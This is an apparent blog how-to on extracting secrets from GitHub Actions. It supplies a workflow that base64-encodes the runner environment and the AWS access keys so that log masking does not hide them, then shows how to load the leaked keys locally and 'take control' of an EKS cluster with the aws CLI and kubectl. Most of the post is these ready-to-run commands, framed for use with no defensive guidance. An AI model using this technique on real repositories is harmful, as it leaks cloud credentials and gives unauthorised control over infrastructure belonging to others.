How to get your GitHub secrets from GitHub Actions
GitHub Secrets
GitHub Actions is an automation and continuous integration/continuous deployment (CI/CD) platform provided by GitHub. It allows you to automate various tasks and workflows within your GitHub repositories, such as building, testing, and deploying your code.
GitHub Actions allows you to store sensitive information, such as API keys or access tokens, as secrets. These secrets are encrypted and can be securely used within your workflows. You can securely store and access secrets within your GitHub Actions workflows, allowing you to automate tasks that require sensitive information without compromising security.
While GitHub Secrets are secure from being exposed in plaintext within your code and logs, they are not foolproof against users with repository access because anyone with write access to the repository can potentially modify or misuse them. GitHub Secrets primarily protect against accidental exposure in public code repositories and are best suited for protecting sensitive information from unintentional leaks rather than malicious actions from users with repository access.
Access to the EKS using GitHub secrets
This post provides instructions for accessing the Amazon EKS service using GitHub secrets. The user is shown how to create a GitHub action, retrieve environment variables, add new credentials, and finally, access the EKS cluster using kubectl or Lens.
1. Take note of your GitHub Secrets
- Access GitHub’s repository settings, locate the Secrets section.
- Examine the names of your stored secrets for reference.
2. Create a GitHub action for the repository that has Admin access through the pipeline.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
name: test
on:
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: Get runner env variables
run: env | base64
- name: Get AWS secrets
env:
AWS_ACCESS_KEY_ID: ${\{ secrets.AWS_ACCESS_KEY_ID }}
AWS_SECRET_ACCESS_KEY: ${\{ secrets.AWS_SECRET_ACCESS_KEY }}
run: |
echo "AWS_ACCESS_KEY_ID= \$AWS_ACCESS_KEY_ID" | base64
echo "AWS_SECRET_ACCESS_KEY= \$AWS_SECRET_ACCESS_KEY" | base64
After you copy this action remove all
\
symbols.
3. Run the action to get the environment variables from the runner
4. The output is base64 encrypted and you need to decrypted it to extract the variables.
5. Add new credentials
1
nano ~/.aws/credentials
1
2
3
4
[test]
aws_access_key_id = <aws_access_key_id>
aws_secret_access_key = <aws_secret_access_key>
region= <region>
1
export AWS_PROFILE=test
6. Check if you ca access the EKS cluster
1
2
3
4
5
6
7
8
9
aws eks list-clusters
Output:
{
"clusters": [
"example1",
"example2"
]
}
7. Check out the AWS account
1
aws sts get-caller-identity
8. Get Kubeconfig file locally
1
aws eks update-kubeconfig --name example1
9. You can now take control of EKS cluster
1
2
3
kubectl get pods -A
kubectl get all -n <name>
kubectl get deployment -n dev <name> -o yaml
Comments powered by Disqus.